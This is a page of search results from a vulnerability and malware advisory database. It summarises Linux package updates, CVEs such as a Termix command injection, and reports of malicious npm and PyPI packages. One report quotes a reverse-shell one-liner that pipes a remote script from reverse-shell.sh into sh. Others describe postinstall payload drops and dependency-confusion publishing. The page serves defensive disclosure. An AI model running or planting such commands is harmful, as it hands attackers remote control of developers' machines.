9545 matches found
Malicious code in 0x2ai-zoe (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 724bd98c39a8e4ff21b039fddeadfda7f0ef7e3c6be47e771d72efed77d02b1b On npm install, scripts/postinstall.cjs copies the entire payload/ tree into process.env.INITCWD the directory the developer ran npm from, depositing...
Photon OS 5.0: Linux PHSA-2026-5.0-0874
An update of the linux package has been released. %NASLMINLEVEL 80900 C Tenable, Inc. The descriptive text and package checks in this plugin were extracted from VMware Security Advisory PHSA-2026-5.0-0874. The text itself is copyright C VMware, Inc. include'compat.inc'; if description...
RHEL 10 : thunderbird (RHSA-2026:22325)
The remote Redhat Enterprise Linux 10 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2026:22325 advisory. Mozilla Thunderbird is a standalone mail and newsgroup client. Security Fixes: firefox: Incorrect boundary conditions in the JavaScript...
RHEL 10 : image-builder (RHSA-2026:22937)
The remote Redhat Enterprise Linux 10 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2026:22937 advisory. A local binary for building customized OS artifacts such as VM images and OSTree commits. Uses osbuild under the hood. Security Fixes:...
CVE-2026-45744 Termix has an OS Command Injection in File Manager resolvePath endpoint
Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.3.2, the GET /ssh/filemanager/ssh/resolvePath endpoint in Termix is vulnerable to OS command injection. The endpoint uses double-quote escaping for shell command...
CVE-2026-45744
Termix web-based server management platform is affected by an OS command injection in the GET /ssh/file_manager/ssh/resolvePath endpoint prior to version 2.3.2. The endpoint uses double-quote escaping for shell command construction, which does not prevent $(...) and backtick command substitution....
CVE-2026-45744
Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.3.2, the GET /ssh/filemanager/ssh/resolvePath endpoint in Termix is vulnerable to OS command injection. The endpoint uses double-quote escaping for shell command...
CVE-2026-45743
Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. 16 file-manager endpoints in Termix prior to version 2.3.2 do not verify that the requesting user owns the SSH session identified by sessionId. An authenticated attacker who knows or...
RockyLinux 9 : rsync (RLSA-2026:19368)
The remote RockyLinux 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the RLSA-2026:19368 advisory. rsync: rsync server leaks arbitrary client files CVE-2024-12086 rsync: Rsync: Use-after-free vulnerability in extended attribute handling CVE-2026-41035...
Photon OS 5.0: Linux PHSA-2026-5.0-0861
An update of the linux package has been released. %NASLMINLEVEL 80900 C Tenable, Inc. The descriptive text and package checks in this plugin were extracted from VMware Security Advisory PHSA-2026-5.0-0861. The text itself is copyright C VMware, Inc. include'compat.inc'; if description...
CVE-2026-48064
pamusb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.1, when a PAM service is configured with denyremote=false in pamusb commonly done for display managers such as gdm-password or lightdm to bypass process/TTY heuristics for local sessions, the PAMRHOST...
Azure Linux 3.0 Security Update: CBL-Mariner Releases (CVE-2026-39832)
The version of CBL-Mariner Releases installed on the remote Azure Linux 3.0 host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the CVE-2026-39832 advisory. - When adding a key to a remote agent constraint extensions such as...
RockyLinux 10 : buildah (RLSA-2026:19032)
The remote RockyLinux 10 host has packages installed that are affected by a vulnerability as referenced in the RLSA-2026:19032 advisory. net/url: Incorrect parsing of IPv6 host literals in net/url CVE-2026-25679 Tenable has extracted the preceding description block directly from the RockyLinux...
Malicious code in @cloudplatform-single-spa/vpc (npm)
Part of a dependency confusion attack campaign targeting the @cloudplatform-single-spa and @mlspace npm scopes. The attacker npm user mr.4nd3r50n published 139 scoped packages at the inflated version 99.99.99, which resolves ahead of any private registry version via npm's default version...
CVE-2026-48064
Summary: pam_usb prior to 0.9.1 allowed a remote XDMCP session to bypass USB authentication when deny_remote=false, because the PAM_RHOST check was gated inside the deny_remote branch. Technical details (supported): pam_usb provides hardware authentication for Linux via removable media. In affect...
PT-2026-44088
pam usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.1, when a PAM service is configured with deny remote=false in pam usb commonly done for display managers such as gdm-password or lightdm to bypass process/TTY heuristics for local sessions, the PAM RHO...
Malicious code in @autofleet/rabbit (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a766d89a5ed19491bd107e5d31c79fbbe7a9be9bce2a957b290408fb9f54140c The package's compiled entry dist/index.js:48 defines let host = process.env.RABBITMQSERVICEHOST || '35.240.13.28' and then connects via...
SUSE SLES15 Security Update : distribution (SUSE-SU-2026:2032-1)
The remote SUSE Linux SLES15 / SLESSAP15 host has a package installed that is affected by a vulnerability as referenced in the SUSE-SU-2026:2032-1 advisory. This update for distribution rebuilds it against the current go security release. Tenable has extracted the preceding description block...
Malicious code in cch-agent (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cba1bd1e6bb56f0c9816ab482e2ee7cc3a8f04d9e253dd3afa67e4c71b3ae3a2 simpleagent/init.py re-exports ask and chat from simpleagent/client.py. Both entry points ignore caller-supplied configuration and route the caller's...
Malicious code in internallib_v493 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7 The package's sole exported function command in index.js executes /bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh", fetching a...